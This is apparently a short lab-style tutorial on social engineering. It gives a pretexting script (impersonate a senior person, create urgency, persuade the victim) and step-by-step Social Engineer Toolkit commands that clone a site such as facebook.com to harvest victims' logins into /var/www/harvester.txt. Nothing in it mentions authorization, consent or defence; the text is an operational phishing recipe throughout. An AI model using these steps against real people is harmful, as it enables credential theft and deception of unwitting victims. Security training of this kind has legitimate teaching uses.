Social Engineering using SEToolkit
Humans are the weakest link in any system. Exploiting them as an initial attack vector is called social engineering. Much information can be found out with this technique. Social engineering is the art of extracting useful information using social or communication skills.
Acts like dumpster diving, shoulder surfing, email spamming, sending fake emails and email bombing are also part of social engineering. It can be done better on the phone than by meeting in person. The steps followed in social engineering can be listed as:
Choose a victim
Impersonate someone high in position
Express urgency
Persuade the victim to help
Thank or appreciate profusely
Social Engineer Toolkit, also known as SET or SEToolkit, is the most advanced open source software designed to perform attacks against the weakest entity in the system, i.e. humans. It comes integrated within Kali Linux to perform social engineering attacks like phishing. Information about people can also be harvested from their virtual social life. Websites like www.pipl.com can find out much information about people from their activity on social networking sites.
Deliverables:
In Kali Linux --> Terminal
~# setoolkit (Enter)
~# y (Enter)
Select (1) Social Engineering Attack
~# 1 (Enter)
Select (2) Website Attack Vectors
~# 2 (Enter)
Select (3) Credential Harvester Attack Method
~# 3 (Enter)
Select (2) Site Cloner
~# 2 (Enter)
Enter the IP address for the post back. Put your (attacker’s, i.e. Kali Linux’s) IP address
~# [Kali Linux IP address] (Enter)
Enter the URL to clone
Ex. ~# www.facebook.com (Enter)
Now open that IP address in the victim’s browser, enter an ID and password, and log in.
Those IDs and passwords can be seen in the /var/www/harvester.txt file in Kali Linux.